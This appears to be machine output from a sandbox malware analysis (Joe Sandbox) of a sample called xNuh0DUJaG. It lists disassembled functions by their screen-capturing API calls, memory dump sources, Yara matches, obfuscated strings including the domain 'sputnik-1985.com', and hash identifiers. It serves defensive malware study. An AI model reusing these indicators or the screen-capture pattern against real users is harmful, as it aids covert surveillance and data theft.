                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02136C71
                                                                                                                                                                                                                                        • CoUninitialize.COMBASE ref: 0210D7BC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                        • String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
                                                                                                                                                                                                                                        • API String ID: 3248263802-1016125510
                                                                                                                                                                                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                        • Instruction ID: 4cfc84a57298ed6a1839eec60b75e785d66f1f3555f4304262f6bce4d7d6355a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01B125756447818BE725CF6AC4E0762FBE2FF96304B18C1ACC4D64BB8AC778A406CB51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                          • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                          • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                          • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                          • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                          • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 0040D555
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                        • String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
                                                                                                                                                                                                                                        • API String ID: 3213364925-1016125510
                                                                                                                                                                                                                                        • Opcode ID: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                                                                                                                                                        • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                        • API String ID: 0-102253164
                                                                                                                                                                                                                                        • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                        • Instruction ID: eedd14aac00b105a06c04efae682c1a3f08f436448e8aa41e2d1099322fcc536
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 503238B19802118BCB24CF24C8927B7B7B2FF95314F2992ADD8415F794E7759802CBD2
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                        • API String ID: 0-102253164
                                                                                                                                                                                                                                        • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                        • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02108B0B
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02108B15
                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02108BBC
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 02108BD1
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02108D1E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                        • String ID: 6W01
                                                                                                                                                                                                                                        • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                        • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                        • Instruction ID: b8119d4ac36c96a109aa36d594b407411a6e85609a36fe25d28a0508d7e5caff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D518E73A843040FD728AF659C85356BAD79FC1314F1FC1399955AB3E5EAB488068BC1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches

Similarity
• API ID:
• String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
• API String ID: 0-2668584225
• Opcode ID: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
• Instruction ID: 5ce4836277cd256feeb600769cb6d52dfc40e56bed850f7285b8a5f083ca366d
• Opcode Fuzzy Hash: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
• Instruction Fuzzy Hash: A4E1F1715483508BC728DF64C89276BB7F2EFD6324F198A1CE4D98B391E3349909CB92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID:
• String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
• API String ID: 0-2668584225
• Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
• Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
• Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
• Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID:
• String ID: J+$JW$]_$bX_^$r}B$+5$/)$3=
• API String ID: 0-2499027453
• Opcode ID: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
• Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
• Opcode Fuzzy Hash: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
• Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID:
• String ID: +$<$H)G+$NmNo$]a_c$tu
• API String ID: 0-4096164410
• Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
• Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
• Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
• Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches

Similarity
• API ID:
• String ID: 8)*6$8)*6$:33F$Ds$]f$}v
• API String ID: 0-771823803
• Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
• Instruction ID: d7e13919bf02b0b5e62e60ba9b02a334ae1d5bcdddd419ba180c300b3996b2f3
• Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
• Instruction Fuzzy Hash: 1EB12B7524C3508BD324CF6884906AFFBE1AFD2218F58892CE4D59B391D7B5CB0ACB56
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID:
• String ID: 8)*6$8)*6$:33F$Ds$]f$}v
• API String ID: 0-771823803
• Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
• Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
• Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
• Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID:
• String ID: )RSP$=^"\$B:$C@$K3$bX_^
• API String ID: 0-3030200349
• Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
• Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
• Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
• Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches

Similarity
• API ID:
• String ID: S"(w$S"(w$d5fg$d5fg$f
• API String ID: 0-2961185688
• Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
• Instruction ID: 19e0acad13b62c9e768ca4f9a2d7bd3ed61b850dd26ee6dfd009e40c3259c750
• Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
• Instruction Fuzzy Hash: 6F12E775A493519FC325CF18C880B2EBBE2AFC5318F18866CF4A55B7A1D771D806CB92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd

Similarity
• API ID: InitializeThunk
• String ID: S"(w$S"(w$d5fg$d5fg$f
• API String ID: 2994545307-2961185688
• Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
• Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
• Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
• Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "#$H}}C$J'N!$LMR|$vu~r
                                                                                                                                                                                                                                        • API String ID: 0-1530353048
                                                                                                                                                                                                                                        • Opcode ID: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
                                                                                                                                                                                                                                        • Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                        • API String ID: 0-3469842109
                                                                                                                                                                                                                                        • Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                                                                                                                                                                                        • Instruction ID: 7a5b6c10130ed03228e70c9137c4cc799e0441b6c82f80d5f6934c3938f2d65e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD02EF746483848FD714CF29C8D076ABBE1EB86300F05866DEA858B3D1D3B5E909CB96
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                        • API String ID: 0-3469842109
                                                                                                                                                                                                                                        • Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                                                                                                                                                                                        • Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                                                                                                                                                                                        • API String ID: 0-2182630447
                                                                                                                                                                                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction ID: eda063c13f1c6caf035864c639b323fe84ecce3b211f5368ba204640dddc52fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FC1377165C3914FD3248F29C4A176BBFE2AFD3604F18896DE4D04B382D3B9840ACB92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                                                                                                                                                                                        • API String ID: 0-2182630447
                                                                                                                                                                                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *+$43A2C7AD89C30672D0632DF0E28DC412$kh$nz${u
                                                                                                                                                                                                                                        • API String ID: 0-3798273896
                                                                                                                                                                                                                                        • Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                                                                                                                                                                                        • Instruction ID: 57744ad7df7e4b48e013c9f71c060b57ff8964db1d14cb9ffb12cf363a020809
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42D1F3716483508BD724DF38C8A1BABBBE2EFC1318F18896DE4D58B292D774D409CB46
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,fbV$d~`}$lvhu$ooKv$sf
                                                                                                                                                                                                                                        • API String ID: 0-4157365443
                                                                                                                                                                                                                                        • Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                                                                                                                                                                                        • Instruction ID: efaaf5cd089f9032885ab5b383d31d15d6f7bb2bf880f3f85bf3c305d517cc11
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D107B15483919FD724CF14C8917ABB7E2AFC5304F08892CE5D68B341E779EA09CB86
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
• API ID:
• String ID: BVAI$_Pna$mc$t
• API String ID: 0-1770441902
• Opcode ID: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
• Instruction ID: c222ed13b36e13a5ea78688ad2f0225c47a922bf8a230a4f50108c222e02a4bb
• Opcode Fuzzy Hash: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
• Instruction Fuzzy Hash: 9CA1B47054C3C18AE739CF2584107BBBBE2AFDB304F18896DD0D997682D779814ACB56
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: BVAI$_Pna$mc$t
• API String ID: 0-1770441902
• Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
• Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
• Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
• Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$8<j?$D$4b
• API String ID: 0-1320392364
• Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction ID: 40eb1d4d35971d9f60b5d00dfc8913f5d5e26bdfb134a76f818aa931e932fd3d
• Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction Fuzzy Hash: A791F86124C3918BD718CF39846137AFBE29FD6218F29896DF4D58B291D339C50AC716
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 0$8<j?$D$4b
• API String ID: 0-1320392364
• Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
• Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: v$v$bt$zi
• API String ID: 0-1945541540
• Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
